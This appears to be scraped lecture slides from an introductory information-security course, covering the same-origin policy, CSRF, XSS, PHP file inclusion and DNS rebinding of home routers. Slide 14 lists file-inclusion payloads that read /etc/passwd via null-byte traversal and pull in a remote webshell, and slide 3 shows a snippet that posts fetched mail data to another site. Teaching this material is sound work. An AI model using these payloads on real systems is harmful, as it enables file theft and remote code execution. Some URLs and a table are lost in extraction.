Presentation is loading. Please wait.

Presentation is loading. Please wait.

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at Itamar Gilad (itamargi at

Similar presentations

Presentation on theme: "Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at Itamar Gilad (itamargi at"— Presentation transcript:

1 Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at Itamar Gilad (itamargi at

2 Today XSS – Cross Site Scripting SOP - Same origin policy CSRF – Cross site request Forgery PHP file inclusion vulnerabilities DNS rebinding (if we have time)

3 Original Problem Problem: $.get("", function(data) { $.post(“”, {maildata: data}); }); Solution: SOP XMLHttpRequest cannot load Origin https://bad- is not allowed by Access-Control- Allow-Origin.

4 Same Origin Policy Modern sites use elements from many different sources (e.g.: main content, embedded ads, embedded google maps controls, embedded twitter feed, etc.) Without the SOP – we’d have to trust ALL that code With the SOP – interactions are limited by ‘origin’ An origin is the combination of domain name and protocol type

5 SOP examples Compared URLOutcomeReason http ː // protocol and host http ː // protocol and host http ː // Same protocol and host but different port protocol host Different host (exact match required) Different host (exact match required) http ː //'t use Port explicit. Depends on implementation in browser.

6 Cross Site Request Forgery User goes to malicious site Site initiates a request to a different site (e.g.: Gmail) Request is sent using user’s credentials Site accepts request, but due to SOP – the attacker cannot read contents or state (‘blind’ attack) … Profit! Psuedo example:

7 CSRF - Limitations Cannot spoof referrer header (but few sites check it) Depends on a ‘GET’ request to cause side- effects Blind attack – if the attack depends on any prior info, attacker has to guess Attack must take place while the user is logged in to the target site Solution: Verification based on random input.

8 XSS – Cross site scripting reloadeed Today, many sites just aggragate user- generated content o Forums o Facebook / Twitter / Reddit o Web mail o Ynet / nrg – ‘talkbacks’ That’s great, but what happens if we trust user submitted content? On a website. A user can submit HTML code Which can be malicious

9 How malicious are they? Once the malicious code runs in the context of the target site, it can do whatever the original site can o Steal javascript-accessible cookies o Use any aspect of the site’s API Write posts Add friends Delete all user content Send out mass-email E.g.: Sammy is my hero

10 Non persistent XSS User clicks a link with extra parameters, the server reflects it back, without proper sanitation

11 Persistent XSS Malicious user submits content to the target site via o Forum post / ‘talkback’ / FB post, twitter post o E-mail o Etc. Content is not sanitized, and therefore – displayed to the user The user’s browser treats it as code from the target site, thereby bypassing the SOP … Profit!

12 Questions?

13 PHP File Inclusion Source: Wikipedia

14 PHP File Inclusion cont. /vulnerable.php?COLOR= C:\\ftp\\upload\\expl oit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability) /vulnerable.php?COLOR= C:\\notes.txt%00 - example using NULLs to remove the.phpsuffix, allowing access to files other than.php /vulnerable.php?COLOR= /etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system directory traversalUNIXdirectory traversal /vulnerable.php?COLOR= /webshell.txt? - injects a remotely hosted file containing a malicious code

15 DNS Rebinding CSRF We’ll discuss a very specific example Client has a home router, which we want to access We can get the client to browse to But thanks for the SOP – JS code from cannot access the router other than blindly (CSRF)

16 Enter DNS Rebinding The DNS for returns two records: o Our web server public address o The requesting client’s address By default, a browser will use the first address, and download our malicious JavaScript That Javascript will make another request to But this time – the server will refuse the connection The browser will happily try the next entry

17 DNS Rebinding cont. But that’s the client’s home router public address… Which should be protected via a FW from access… But since most routers are configured with interface-based rules, and have internal webservers that listen on – it won’t matter – they will answer our client So now our JS code can connect to and access the home router! And it can still connect back outside

18 DNS Rebinding doesn’t work anymore Most routers will use HTTP-authentication You used to be able to browse to: http://user:password@ http://user:password@ But it has been disabled. All HTTP auth now requires a user dialog Which makes the attack non-feasible Also, there are some browser and network mitigations one can do (DNS pinning, DNS filtering, NoScript, etc.)

19 Questions?

Download ppt "Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at Itamar Gilad (itamargi at"

Similar presentations

Ads by Google